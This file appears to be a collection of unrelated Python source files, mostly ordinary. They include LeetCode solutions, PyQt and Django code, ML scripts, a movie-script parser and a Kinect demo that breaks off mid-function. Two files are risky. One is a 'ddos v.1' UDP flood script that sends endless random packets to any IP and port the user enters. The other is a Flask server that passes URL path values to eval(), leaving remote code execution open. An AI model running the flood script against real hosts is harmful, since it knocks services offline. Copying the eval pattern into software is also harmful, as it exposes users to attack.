# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def hasCycle(self, head):
"""
:type head: ListNode
:rtype: bool
"""
if head == None:
return False
#使用两个速度不同的指针遍历数组,如果存在环,则两者会相遇
slow = head
fast = head.next
while True:
if slow == fast:
return True
if slow != None and fast != None and fast.next != None:
slow = slow.next
fast = fast.next.next
else:
return False
if __name__ == '__main__':
s = Solution()
|
import hpp_idl.hpp.manipulation_idl
from .client import Client
from .problem_solver import ProblemSolver, newProblem
from .constraint_graph import ConstraintGraph
from .constraint_graph_factory import ConstraintGraphFactory
from .constraints import Constraints
from .robot import CorbaClient, Robot
from hpp.corbaserver import loadServerPlugin, createContext
from hpp_idl.hpp.corbaserver.manipulation import Rule
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'home.ui'
#
# Created by: PyQt5 UI code generator 5.15.2
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
from StockData import Ui_StockData
from StockSearching import Ui_StockSearching
from StockCalc import Ui_StockCalc
class Ui_Home(object):
def setupUi(self, Home, prewindow, user):
Home.setObjectName("Home")
Home.resize(519, 505)
self.lblRealPrice = QtWidgets.QLabel(Home)
self.lblRealPrice.setGeometry(QtCore.QRect(190, 510, 131, 21))
font = QtGui.QFont()
font.setPointSize(12)
self.lblRealPrice.setFont(font)
self.lblRealPrice.setText("")
self.lblRealPrice.setObjectName("lblRealPrice")
self.btnStockCalc = QtWidgets.QPushButton(Home)
self.btnStockCalc.setGeometry(QtCore.QRect(160, 290, 181, 61))
font = QtGui.QFont()
font.setPointSize(10)
self.btnStockCalc.setFont(font)
self.btnStockCalc.setObjectName("btnStockCalc")
self.btnStockSearch = QtWidgets.QPushButton(Home)
self.btnStockSearch.setGeometry(QtCore.QRect(160, 210, 181, 61))
font = QtGui.QFont()
font.setPointSize(10)
self.btnStockSearch.setFont(font)
self.btnStockSearch.setObjectName("btnStockSearch")
self.btnStockInsert = QtWidgets.QPushButton(Home)
self.btnStockInsert.setGeometry(QtCore.QRect(160, 130, 181, 61))
font = QtGui.QFont()
font.setPointSize(10)
self.btnStockInsert.setFont(font)
self.btnStockInsert.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
self.btnStockInsert.setObjectName("btnStockInsert")
self.btnLogout = QtWidgets.QPushButton(Home)
self.btnLogout.setGeometry(QtCore.QRect(10, 470, 75, 23))
self.btnLogout.setCheckable(False)
self.btnLogout.setAutoRepeat(False)
self.btnLogout.setAutoExclusive(False)
self.btnLogout.setDefault(False)
self.btnLogout.setFlat(True)
self.btnLogout.setObjectName("btnLogout")
self.btnStockInsert.clicked.connect(self.showStockData)
self.btnStockSearch.clicked.connect(self.showStockSearch)
self.btnStockCalc.clicked.connect(self.showStockCalc)
self.btnLogout.clicked.connect(self.logout)
self.thiswindow = Home
self.prewindow = prewindow
self.retranslateUi(Home)
QtCore.QMetaObject.connectSlotsByName(Home)
def logout(self):
self.thiswindow.hide()
self.prewindow.show()
def showStockCalc(self):
self.window = QtWidgets.QMainWindow()
self.ui = Ui_StockCalc()
self.ui.setupUi(self.window)
self.thiswindow.hide()
self.window.show()
def showStockSearch(self):
self.window = QtWidgets.QMainWindow()
self.ui = Ui_StockSearching()
self.ui.setupUi(self.window)
self.thiswindow.hide()
self.window.show()
def showStockData(self):
self.window = QtWidgets.QMainWindow()
self.ui = Ui_StockData()
self.ui.setupUi(self.window,self.thiswindow)
self.thiswindow.hide()
self.window.show()
def retranslateUi(self, Home):
_translate = QtCore.QCoreApplication.translate
Home.setWindowTitle(_translate("Home", "Dialog"))
self.btnStockCalc.setText(_translate("Home", "คำนวณรายการออมหุ้น"))
self.btnStockSearch.setText(_translate("Home", "ค้นหารายชื่อหุ้นที่ทำรายการ"))
self.btnStockInsert.setText(_translate("Home", "เพิ่มรายการหุ้นจดทะเบียน"))
self.btnLogout.setText(_translate("Home", "Logout"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Home = QtWidgets.QDialog()
ui = Ui_Home()
ui.setupUi(Home)
Home.show()
sys.exit(app.exec_())
|
"""
Code taken from ColBERT (new_api branch), which is distributed under Apache-compatible MIT license.
https://github.com/stanford-futuredata/ColBERT/tree/new_api/colbert
"""
import torch
def tensorize_triples(query_tokenizer, doc_tokenizer, queries, passages, scores, bsize, nway):
# assert len(passages) == len(scores) == bsize * nway
# assert bsize is None or len(queries) % bsize == 0
# N = len(queries)
Q_ids, Q_mask = query_tokenizer.tensorize(queries)
D_ids, D_mask = doc_tokenizer.tensorize(passages)
query_batches = _split_into_batches(Q_ids, Q_mask, bsize)
doc_batches = _split_into_batches(D_ids, D_mask, bsize * nway)
if len(scores):
score_batches = _split_into_batches2(scores, bsize * nway)
else:
score_batches = [[] for _ in doc_batches]
batches = []
for Q, D, S in zip(query_batches, doc_batches, score_batches):
batches.append((Q, D, S))
return batches
def _sort_by_length(ids, mask, bsize):
if ids.size(0) <= bsize:
return ids, mask, torch.arange(ids.size(0))
indices = mask.sum(-1).sort().indices
reverse_indices = indices.sort().indices
return ids[indices], mask[indices], reverse_indices
def _split_into_batches(ids, mask, bsize):
batches = []
for offset in range(0, ids.size(0), bsize):
batches.append((ids[offset:offset+bsize], mask[offset:offset+bsize]))
return batches
def _split_into_batches2(scores, bsize):
batches = []
for offset in range(0, len(scores), bsize):
batches.append(scores[offset:offset+bsize])
return batches
|
from flask import Flask
import json
import os, subprocess, sys, time
from automation.epson import Frame
DEBUG_MODE = True
_current_frame = Frame.Frame()
server = None
def create_app():
app=Flask("automation.epson")
@app.route("/")
def root():
global _current_frame
return str(_current_frame)
@app.route("/view")
def route_current_frame():
global _current_frame
try:
_current_frame
except NameError:
return "ERROR - Current Frame not initialized"
else:
# html = [_current_frame.pretty_str(), ]
return _current_frame.pretty_str()
@app.route("/add_variable/{key}/{value}")
def add_variable(key,value):
global _current_frame
try:
_current_frame[key]=value
_current_frame.save_to_json()
return "ok"
except Exception as e:
return e
@app.route("/update_variable/<key>/<value>")
def update_variable(key,value):
global _current_frame
try:
if isinstance(value, str):
value=eval(value) #string to type conversion, dangerous and quick!
msg = _current_frame.__setitem__(key,value,update=True)
_current_frame.save_to_json()
return "ok:\t"+msg
except Exception as e:
return str(e)
@app.route("/update_variables/<variables_dict>")
def update_dict(variables_dict):
try:
variables_dict = eval(variables_dict)
for k,v in variables_dict.items():
update_variable(k,v)
return "ok"
except Exception as e:
return "Error during dictionary upload of {k}[{v}]: {}".format(k,v,e)
@app.route("/delete_variable/<key>")
def delete_variable(key):
global _current_frame
try:
del _current_frame[key]
_current_frame.save_to_json()
return _current_frame.comm_str()
except Exception as e:
return str(e)
@app.route("/keys")
def get_keys():
global _current_frame
return ",".join(_current_frame._keys())
return app
def start_server():
global server
os.environ["FLASK_APP"]="automation.epson:create_app()"
os.environ["FLASK_ENV"]="development"
os.environ["FLASK_DEBUG"]="1"
server = subprocess.Popen(["python","-m","flask","run"], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
print("starting server")
#delay to let server start up, this should be improved.....
for i in range(10):
sys.stdout.write(".")
sys.stdout.flush()
time.sleep(.2)
print("done")
def stop_server():
server.kill()
|
"""
https://leetcode.com/problems/remove-nth-node-from-end-of-list/
Given the head of a linked list, remove the nth node from the end of the list and return its head.
"""
from typing import Optional
# Definition for singly-linked list.
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def removeNthFromEnd(self, head: Optional[ListNode], n: int) -> Optional[ListNode]:
if not head:
return None
dummy = ListNode(val=-1, next=head)
counter = 0 # start with 0
prev = ptr1 = ptr2 = dummy
# peek ptr1.next, do not incr counter if ptr1 has reached end of list
while ptr1.next:
ptr1 = ptr1.next
counter = counter + 1
# when to move ptr2? avoid off by one error by drawing on paper
if counter >= n:
prev = ptr2
ptr2 = ptr2.next
prev.next = prev.next.next
return dummy.next
|
# Generated by Django 3.1.1 on 2020-10-19 14:37
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('main', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='BillingAddress',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('street_address', models.CharField(max_length=150)),
('apartment_address', models.CharField(blank=True, max_length=150, null=True)),
('zipcode', models.CharField(blank=True, max_length=150, null=True)),
],
options={
'verbose_name': 'Address',
'verbose_name_plural': 'Addresses',
},
),
migrations.CreateModel(
name='Payment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('charge_id', models.CharField(max_length=150)),
('amount', models.FloatField()),
('timestamp', models.DateTimeField(auto_now=True)),
('updated', models.DateTimeField(auto_now_add=True)),
],
options={
'verbose_name': 'Payment',
'verbose_name_plural': 'Payments',
},
),
migrations.CreateModel(
name='OrderItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ordered', models.BooleanField(default=False)),
('quantity', models.IntegerField(default=1)),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.item')),
],
options={
'verbose_name': 'Order Item',
'verbose_name_plural': 'Order Items',
},
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start_date', models.DateTimeField(auto_now_add=True)),
('ordered_date', models.DateTimeField()),
('ordered', models.BooleanField(default=False)),
('billing_address', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='cart.billingaddress')),
('items', models.ManyToManyField(to='cart.OrderItem')),
('payment', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='cart.payment')),
],
options={
'verbose_name': 'Order',
'verbose_name_plural': 'Orders',
},
),
]
|
#!/usr/bin/env python
import io_utils as io
from text_cleaner import Cleaner
import config_text_cleaner as conf
def test_stopwords_removal():
original_content = io.load_file_rows(conf.STOP_WORDS_TEST_INPUT_FILE)
cleaned_content = ""
cleaner = Cleaner()
for row in original_content:
print("row: {0}".format(row))
cleaned_content += cleaner.clean_text(row) + "\n"
io.save_file(cleaned_content, conf.STOP_WORDS_TEST_OUTPUT_FILE)
def test_special_characters_removal():
original_content = io.load_file_rows(conf.SPECIAL_CHARACTERS_TEST_INPUT_FILE)
cleaned_content = ""
cleaner = Cleaner()
for row in original_content:
cleaned_content += cleaner.clean_text(row) + "\n"
io.save_file(cleaned_content, conf.SPECIAL_CHARACTERS_TEST_OUTPUT_FILE)
if __name__ == '__main__':
test_stopwords_removal()
test_special_characters_removal()
|
#!/usr/bin/env python
import os
import tika
import shutil
import time
from tika import parser
tika.TikaClientOnly = True
from datetime import datetime
headers = {
'X-Tika-PDFextractInlineImages': 'true',
}
#java -jar tika-server-1.22.jar --port 8001 #to start the server on port 8001
#'http://localhost:8001' origin server code
fs = os.listdir('pdfs/') #list files in specified directory in a list
root = 'pdfs/'
fs = [f for f in fs if os.path.join(root, f) and (str(f).endswith('.pdf') or str(f).endswith('.docx')
or str(f).endswith('.pptx') or str(f).endswith('.doc') or str(f).endswith('.html') )] #using list comprehension to iterate through pdf and docx files
start = datetime.now()
for f in fs:
d = os.path.join(root, f)
frt = parser.from_file(d, serverEndpoint='http://localhost:8001/rmeta/text', headers=headers) #parse document file to tika server for text extraction
data = str((frt["content"])) #store extracted content from each file to variable data
outfn = f[:-5] + '.txt' #create a new file with filename and extension of .txt
file = open(outfn, "w") #open file in write mode
file.write(data) #write content of data to opened file
file.close() #close file
shutil.move(outfn, 'text/')
end = datetime.now()
print('done...')
print (end - start) |
# urllib 和 urllib2 都是接受URL请求的相关模块,但是提供了不同的功能。两个最显著的不同如下:
# urllib 仅可以接受URL,不能创建 设置了headers 的Request 类实例;
#
# 但是 urllib 提供 urlencode 方法用来GET查询字符串的产生,而 urllib2 则没有。
# (这是 urllib 和 urllib2 经常一起使用的主要原因)
#
# 编码工作使用urllib的urlencode()函数,帮我们将key:value这样的键值对转换成"key=value"这样的字符串,
# 解码工作可以使用urllib的unquote()函数。(注意,不是urllib2.urlencode() )
import urllib.parse
word = {"wd": "传智"}
print(word)
# 通过urllib.urlencode()方法,将字典键值对按URL编码转换,从而能被web服务器接受。
urlencode = urllib.parse.urlencode(word) # 在python 2.*中,直接使用urllib.urlencode(word)
print(urlencode)
# 通过urllib.unquote()方法,把 URL编码字符串,转换回原先字符串。
print(urllib.parse.unquote("wd=%E4%BC%A0%E6%99%BA"))
|
from time import time
import numpy as np
from .numlib import inv_sym_matrix
from .gaussian import (Gaussian,
GaussianFamily,
FactorGaussianFamily)
families = {'gaussian': GaussianFamily,
'factor_gaussian': FactorGaussianFamily}
class LFit(object):
def __init__(self, sample, family='gaussian'):
"""
Importance weighted likelihood fitting method.
"""
t0 = time()
self.sample = sample
self.dim = sample.x.shape[0]
self.npts = sample.x.shape[1]
# Instantiate fitting family
if family not in families.keys():
raise ValueError('unknown family')
self.family = families[family](self.dim)
# Pre-compute some stuff and cache it
self._cache = {'F': self.family.design_matrix(sample.x)}
# Perform fit
self._do_fitting()
self.time = time() - t0
def _do_fitting(self):
F = self._cache['F']
self._integral = np.dot(F, self.sample.pe) / self.npts
self._integral *= np.exp(self.sample.logscale)
self._fit = self.family.from_integral(self._integral)
def _get_integral(self):
return self._integral
def _get_var_integral(self):
"""
Estimate variance on integral estimate
"""
F, pe, integral = self._cache['F'], self.sample.pe, self._integral
n = integral.size
var = np.dot(F * (pe ** 2), F.T) / self.npts \
- np.dot(integral.reshape(n, 1), integral.reshape(1, n))
var /= self.npts
return var
def _get_fit(self):
return self._fit
def _get_theta(self):
theta = self._fit.theta.copy()
theta -= self.sample.kernel.theta
return theta
def _get_sensitivity_matrix(self):
F = self._cache['F']
# compute the fitted importance weights
log_qe = np.dot(F.T, self._fit.theta) +\
- self.sample.kernel.log(self.sample.x)
qe = np.exp(log_qe - self.sample.logscale)
return np.dot(F * qe, F.T) *\
(np.exp(self.sample.logscale) / self.npts)
def _get_var_theta(self):
inv_sensitivity_matrix = inv_sym_matrix(self.sensitivity_matrix)
return np.dot(np.dot(inv_sensitivity_matrix, self.var_integral),
inv_sensitivity_matrix)
def _get_kl_error(self):
return .5 * np.trace(np.dot(self.var_integral,
inv_sym_matrix(self.sensitivity_matrix)))
theta = property(_get_theta)
fit = property(_get_fit)
integral = property(_get_integral)
var_integral = property(_get_var_integral)
var_theta = property(_get_var_theta)
sensitivity_matrix = property(_get_sensitivity_matrix)
kl_error = property(_get_kl_error)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render
from django.shortcuts import redirect
# Create your views here.
def index(request):
return render(request, 'index.html')
def pagamento(request):
return render(request, 'pagamentotransparente.html')
def cadastroplano(request):
return render(request, 'criarplano.html')
def assinatura(request):
return render(request, 'assinatura.html')
|
"""ddos v.1"""
import os, sys, time, socket, random
#####################
ddos = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
bytes = random._urandom(5120)
#####################
os.system("clear")
os.system("\tfiglet ddos v1")
print ("\tAuthor : Pound")
print ("\tGroup : PlusX")
print ("\tVersion : 1")
print ("\tGithub : https://github.com/Pound123")
IP = raw_input("\nIP : ")
Port = input("Port : ")
attacking = 1000
while True:
ddos.sendto(bytes, (IP, Port))
attacking = attacking + 1
print ("Attacking %s Packet to %s Port:%s"%(attacking, IP, Port))
|
# n = input('Digite algo: ')
# print(n.isnumeric()) # e numerico?
# print(n.isalpha()) # e alfa?
# print(n.isalnum()) # e alfanumerico?
# print(n.isupper()) # e caixa alta?
# Faca um porgrama que leia dois numeros e realize a soma entre ele mostrando o resultado
# Faca um porgrama que leia algo pelo teclado e mostre na tela o seu tipo primitivo e todas as informacoes possiveis sobre ele
n1 = float(input('Digite o primeiro numero: '))
n2 = float(input('Digite o segundo numero: '))
s = n1+n2
print('A soma entre {} e {} ]e igal a {}'.format(n1, n2, s))
print('AGORA VAMOS AVALIAR AS PROPRIEDADES DO TEXTO DIGITADO')
tx = input('Digite algo: ')
print('O texto e numerico? = ', tx.isnumeric())
print('O texto e CAIXA ALTA? = ', tx.isupper())
print('O texto e alfa numerico? = ', tx.isalnum())
print('O texto e alfabetico? = ', tx.isalpha())
|
# coding: utf-8
from Data import DataStream
import random
d = DataStream.parse(open("data/full/clef50_ALL_labeled_ALL").read())
dropped_fields = ['publication_types', 'mesh_terms', 'keywords', 'journal', 'references']
for row in d:
if row.split == 'test' and random.random() < 0.5:
for field in dropped_fields:
row[field] = 'MISSING_FEATURE'
print d.marshall()
|
import cv2
import consts
import time
from utils import get_saved_model
import tensorflow as tf
from tensorflow import keras
import numpy as np
def sectional_density(image, draw=False, sparsity=1, w=4, h=4, weighted=False, make2D = False):
steps = 0
image_size = len(image)
CELL_WIDTH, CELL_HEIGHT = w, h
pixel_percentages = [0 for i in range((image_size // CELL_WIDTH) * (image_size // CELL_HEIGHT))]
total_black_pixels, count = 0, 0
for corner_y in range(0, (image_size - CELL_HEIGHT + 1), CELL_HEIGHT):
for corner_x in range(0, (image_size - CELL_WIDTH + 1), CELL_WIDTH):
if draw:
cv2.rectangle(image, (corner_x, corner_y), (corner_x+CELL_WIDTH, corner_y+CELL_HEIGHT), \
consts.RED, consts.AREA_BOUNDARY_THICKNESS)
for i in range(0, CELL_HEIGHT, sparsity):
for j in range(0, CELL_WIDTH, sparsity):
steps += 1
pixel_percentages[count] += image[corner_y + i][corner_x + j]
total_black_pixels += image[corner_y + i][corner_x + j]
count += 1
# if weighted:
# for i in range(len(pixel_percentages)):
# pixel_percentages[i] = pixel_percentages[i] * total_black_pixels
if make2D:
pixel_percentages = [pixel_percentages[i:i+w] for i in [w*j for j in range(w)]]
return pixel_percentages
class NN(object):
def __init__(self, model_name):
self.model = get_saved_model(model_name)
self.probability_model = tf.keras.Sequential([self.model, tf.keras.layers.Softmax()])
def predict(self, img):
bw_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
resized_img = cv2.resize(bw_img, (80, 80))
unknown_img = np.array([resized_img]).astype(np.float32)
prediction = self.probability_model.predict_classes(unknown_img)[0]
return prediction |
import os
import json
from os import listdir, getcwd
from os.path import join
classes = ["person", "bicycle", "car", "motorcycle", "airplane", "bus", "train",
"truck", "boat", "traffic light", "fire hydrant", "stop sign", "parking meter",
"bench", "bird", "cat", "dog", "horse", "sheep", "cow", "elephant", "bear", "zebra",
"giraffe", "backpack", "umbrella", "handbag", "tie", "suitcase", "frisbee", "skis",
"snowboard", "sports ball", "kite", "baseball bat", "baseball glove", "skateboard",
"surfboard", "tennis racket", "bottle", "wine glass", "cup", "fork", "knife", "spoon",
"bowl", "banana", "apple", "sandwich", "orange", "broccoli", "carrot", "hot dog", "pizza",
"donut", "cake", "chair", "couch", "potted plant", "bed", "dining table", "toilet", "tv",
"laptop", "mouse", "remote", "keyboard", "cell phone", "microwave", "oven", "toaster", "sink",
"refrigerator", "book", "clock", "vase", "scissors", "teddy bear", "hair drier", "toothbrush"]
# box form[x,y,w,h]
def convert(size, box):
dw = 1. / size[0]
dh = 1. / size[1]
x = box[0] * dw
y = box[1] * dh
w = box[2] * dw
h = box[3] * dh
return (x, y, w, h)
def convert_annotation():
with open(r"C:\Users\shast\datasets\COCOtrain2014\annotations\instances_train2014.json", 'r') as f:
data = json.load(f)
for item in data['images']:
image_id = item['id']
file_name = item['file_name']
width = item['width']
height = item['height']
value = filter(lambda item1: item1['image_id'] == image_id, data['annotations'])
outfile = open(r"C:\Users\shast\datasets\COCOtrain2014\annotations\label-txt\%s.txt"% (file_name[:-4]), 'a+')
for item2 in value:
category_id = item2['category_id']
value1 = filter(lambda item3: item3['id'] == category_id, data['categories'])
name = value1.__next__()['name']
class_id = classes.index(name)
box = item2['bbox']
bb = convert((width, height), box)
outfile.write(str(class_id) + " " + " ".join([str(a) for a in bb]) + '\n')
outfile.close()
if __name__ == '__main__':
convert_annotation() |
# Generated by Django 3.0.8 on 2020-07-22 17:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('note', '0002_auto_20200720_0409'),
]
operations = [
migrations.AddField(
model_name='note',
name='title',
field=models.CharField(default='Unknow Title', max_length=50),
),
]
|
import re
import Conversation
class MovieParser:
Location_pattern = re.compile("^\s*(INT\.|EXT\.)")
Name_pattern = re.compile("(?=.* [A-Z][A-Z])")
End_of_speach = re.compile("^$")
def __init__ (self, path):
self.__file_path =path
self.__file = open(path, "r")
self.__characters = set()
# def main(self):
def get_scene(self):
conversation = []
speach = ""
line = self.__file.readline()
while line: # start reading script lines
match_name = re.search(MovieParser.Name_pattern, line)
if match_name: # if found character name
name = line.strip()
if(name != "CUT TO:"):
conversation.append(self.get_conversation(line))
line = self.__file.readline()
def get_conversation(self, line):
conversation = []
match_name = re.search(MovieParser.Name_pattern, line)
while match_name:
name = line.strip()
if(name == "CUT TO"):
return conversation
self.__characters.add(name)
conversation.append(self.get_speach())
line = self.__file.readline()
match_name = re.search(MovieParser.Name_pattern, line)
print(conversation)
return conversation
def get_speach(self,):
speech = ""
line = self.__file.readline()
match = re.search(MovieParser.End_of_speach, line)
while not match:
speech = speech+line
line = self.__file.readline()
match = re.search(MovieParser.End_of_speach, line)
print(speech)
return speech
movie = MovieParser("movie")
movie.get_scene()
|
# a) [a-zA-Z]*e$
# b) unmöglich
# c) [([Mo|Tu|We|Th|Fr|Sa|Su] - [Mo|Tu|We|Th|Fr|Sa|Su]) | [winter|summer]]? [\d?\d:\d\d [am|pm] -? ?,]+
# [([Mo|Tu|We|Th|Fr|Sa|Su] - [Mo|Tu|We|Th|Fr|Sa|Su]) | [winter|summer]]? [\d?\d:\d\d [am|pm] -? ?,]+
# - ... Mo-Fr 8:30am-4:30pm ...
# - ... winter: 6:30 pm, 7:30pm, 8:30 pm daily; summer: 8:30pm, 9:30pm, 10:30pm daily ...
# - ... 9 am - 4:30 pm ...
import re
# p = re.compile('[a-zA-Z]*e$')
p = re.compile('(\w\w\w\w)$')
s=['ww', 'thte', 'WWWweeE', 'e', 'wwwwEeeEeweweweOOe']
for w in s:
if(p.match(w)):
print('Match: ' + w)
else:
print('Not matched: ' + w)
|
import tflearn
from tflearn.layers.conv import conv_2d, max_pool_2d
from tflearn.layers.core import input_data, dropout, fully_connected
from tflearn.layers.estimator import regression
import tflearn.datasets.mnist as mnist
# Load in data
X, Y, test_x, test_y = mnist.load_data(one_hot=True)
# Reshape data for tflearn
X = X.reshape([-1, 28, 28, 1])
# Reshape test data for tflearn
test_x = test_x.reshape([-1, 28, 28, 1])
# Model input layer
convnet = input_data(shape=[None,28,28,1],name='input')
# Convolute: input model, size, window, activation function (rectify linear)
convnet = conv_2d(convnet, 32, 2, activation='relu')
# Pool: net, window
convnet = max_pool_2d(convnet, 2)
# Convolute: input model, size, window, activation function (rectify linear)
convnet = conv_2d(convnet, 64, 2, activation='relu')
# Pool: net, window
convnet = max_pool_2d(convnet, 2)
# Fully Connected Layer: input, input size, activation function
convnet = fully_connected(convnet, 1024, activation='relu')
# Dropout neurons
convnet = dropout(convnet, 0.8)
# Output Layer (also a fully connected layer with different activation function)
convnet = fully_connected(convnet, 10, activation='softmax')
# Run Regression on convolution net: calculate loss
convnet = regression(convnet, optimizer='adam', learning_rate=0.01,
loss='categorical_crossentropy', name='targets')
# Deep Neural Network
model = tflearn.DNN(convnet)
model.fit({'input':X}, {'targets':Y}, n_epoch=10,
validation_set=({'input':test_x}, {'targets':test_y}),
snapshot_step=500, show_metric=True, run_id='mnist')
# Saves weights values NOT model
model.save('tflearn_conv.model')
"""
Loading weights from previous run
model.load('tflearn_conv.model')
"""
# Get Prediction
print(model.predict([test_x[1]])) |
import numpy as np
class AtomPair:
def __init__(self, name1, name2, selection1, selection2, k=10., b=5.):
self.name1 = name1
self.name2 = name2
self.selection1 = selection1
self.selection2 = selection2
self.atom1 = None # MDAnalysis Atom Obejct
self.atom2 = None # MDAnalysis Atom Obejct
self.distances = list()
self.k = k
self.b = b
self.pairname = "{0}-{1}".format(self.name1, self.name2)
def set_atom1(self, atom):
self.atom1 = atom
def set_atom2(self, atom):
self.atom2 = atom
def get_distance(self):
return np.linalg.norm(self.atom1.positions[0] - self.atom2.positions[0])
def append_distances(self):
self.distances.append(np.linalg.norm(self.atom1.positions[0] - self.atom2.positions[0]))
def __repr__(self):
return "{0}-{1}".format(self.name1, self.name2)
def __hash__(self):
return hash(self.name1) + hash(self.name2)
def __eq__(self, other):
if self.name1 == other.name1 and self.name2 == other.name2:
return True
elif self.name1 == other.name2 and self.name2 == other.name1:
return True
else:
return False |
from django.contrib import admin
from .models import Place,Question,Choice
from import_export.admin import ExportActionModelAdmin, ImportExportMixin, ImportMixin
class PlaceAdmin(ImportExportMixin,admin.ModelAdmin):
pass
admin.site.register(Place)
admin.site.register(Question)
admin.site.register(Choice)
|
# ############################################################################
#
# Copyright (c) Microsoft Corporation.
#
# Available under the Microsoft PyKinect 1.0 Alpha license. See LICENSE.txt
# for more information.
#
# ###########################################################################/
import thread
import itertools
import ctypes
import pykinect
from pykinect import nui
from pykinect.nui import JointId
import pygame
from pygame.color import THECOLORS
from pygame.locals import *
import numpy
from scipy import ndimage
from operator import *
from random import *
from math import *
KINECTEVENT = pygame.USEREVENT
DEPTH_WINSIZE = 640,480
pygame.init()
# Screen resolution...
RES = numpy.array((DEPTH_WINSIZE))
CHUNKY = RES/2
PI = 3.14159
DEG2RAD = PI/180
skeleton_to_depth_image = nui.SkeletonEngine.skeleton_to_depth_image
# recipe to get address of surface: http://archives.seul.org/pygame/users/Apr-2008/msg00218.html
if hasattr(ctypes.pythonapi, 'Py_InitModule4'):
Py_ssize_t = ctypes.c_int
elif hasattr(ctypes.pythonapi, 'Py_InitModule4_64'):
Py_ssize_t = ctypes.c_int64
else:
raise TypeError("Cannot determine type of Py_ssize_t")
_PyObject_AsWriteBuffer = ctypes.pythonapi.PyObject_AsWriteBuffer
_PyObject_AsWriteBuffer.restype = ctypes.c_int
_PyObject_AsWriteBuffer.argtypes = [ctypes.py_object,
ctypes.POINTER(ctypes.c_void_p),
ctypes.POINTER(Py_ssize_t)]
def surface_to_array(surface):
buffer_interface = surface.get_buffer()
address = ctypes.c_void_p()
size = Py_ssize_t()
_PyObject_AsWriteBuffer(buffer_interface,
ctypes.byref(address), ctypes.byref(size))
bytes = (ctypes.c_byte * size.value).from_address(address.value)
bytes.object = buffer_interface
return bytes
def skeleton_frame_ready(frame):
skeletons = frame.SkeletonData
if skeletons is not None:
for index, data in enumerate(skeletons):
if (data.eTrackingState == nui.SkeletonTrackingState.TRACKED):
left_hand_pos = skeleton_to_depth_image(data.SkeletonPositions[JointId.HandLeft], CHUNKY[0], CHUNKY[1])
right_hand_pos = skeleton_to_depth_image(data.SkeletonPositions[JointId.HandRight], CHUNKY[0], CHUNKY[1])
#left_hand = data.SkeletonPositions[JointId.HandLeft]
#print left_hand_pos[0]
#print left_hand_pos[1]
draw_cross(320-int(left_hand_pos[0]), int(left_hand_pos[1]))
draw_cross(320-int(right_hand_pos[0]), int(right_hand_pos[1]))
def depth_frame_ready(frame):
global depth_frame_bits
if video_display:
return
#depth_frame_array = numpy.ctypeslib.as_array(frame.image.bits)
depth_frame_bits = frame.image.bits
#address = surface_to_array(dept_frame_surface)
#ctypes.memmove(address, frame.image.bits, len(address))
#del address
#pygame.display.update()
# ------------------------------------------------------------------------------------
def make_indices_array(shape):
"creates a 3d array where each 2d index is the value"
a = numpy.indices(shape[::-1])
return numpy.transpose(a, (0,2,1))[::-1]
# ------------------------------------------------------------------------------------
def texturemap(flattened_texture, heightmap, indices_array):
"tie it all together (all must have same 2d dimensions)"
shape = heightmap.shape
distortion = heightmap #>> 1
indices = numpy.array(indices_array)
indices[0] += distortion
indices[1] += distortion
indices[0] %= shape[0]
indices[1] %= shape[1]
lookup = indices[0]*shape[1] + indices[1]
mapped = numpy.take(flattened_texture, lookup.flat)
return numpy.reshape(mapped, shape)
# ------------------------------------------------------------------------------------
def Draw_water(dest, map, texture, LightModifier, indicies):
"Calcs the heights slopes, applies texturing, returns for screen draw"
# For each pixel in the buffer, the delta = this_pixel - next_pixel. We don't calculate the edges...
h_map = numpy.zeros(CHUNKY, dtype=int)
thispix = map[1:-1,1:-1]
nextpix = map[:-2,1:-1]
h_map[1:-1,1:-1] = thispix - nextpix
# The array of deltas is then used in the texture mapping to grab source pixels
# Note: the "python" version of the texture mapping routine is in comments below.
h_map += texturemap(texture,h_map, indicies)
# Quick diversion:
# for no texturing, comment out the line above, to remove lighting, change the '+=' to '='
# Ramp down by our lighting modifier...
h_map /= int(pow(2, LightModifier))
# Make sure all values are between 0 and 255 (maps to the palette)
dest = numpy.clip(h_map,0,255)
# Return the buffer for screen draw...
return dest
# ------------------------------------------------------------------------------------
def Calc_water(opage, mymap, density):
"Performs the smothing of the height map..."
# Setup the height maps for reference.
new_page = mymap[opage]
old_page = mymap[opage^1]
center = new_page[1:-1,1:-1]
origcenter = numpy.array(center)
center[:] = old_page[2:,2:]
center += old_page[1:-1,2:]
center += old_page[:-2,2:]
center += old_page[2:,1:-1]
center += old_page[:-2,1:-1]
center += old_page[2:,:-2]
center += old_page[1:-1,:-2]
center += old_page[:-2,:-2]
center /= 4
center -= origcenter
center -= (center / int(pow(2, density)))
def heightBlob(x, y, height, radius, h_map):
"Draws a large circle in the height map - Doesn't do the sine effect of the original"
rquad = 0
cx = 0
cy = 0
cyq = 0
left = 0
top = 0
right = 0
bottom = 0
rquad = radius * radius
# Set the dimensions
left = -radius
right = radius
top = -radius
bottom = radius
# Clip it's edges if our placement is going to go south
if ((x - radius) < 1):
left -= ((x - radius) - 1)
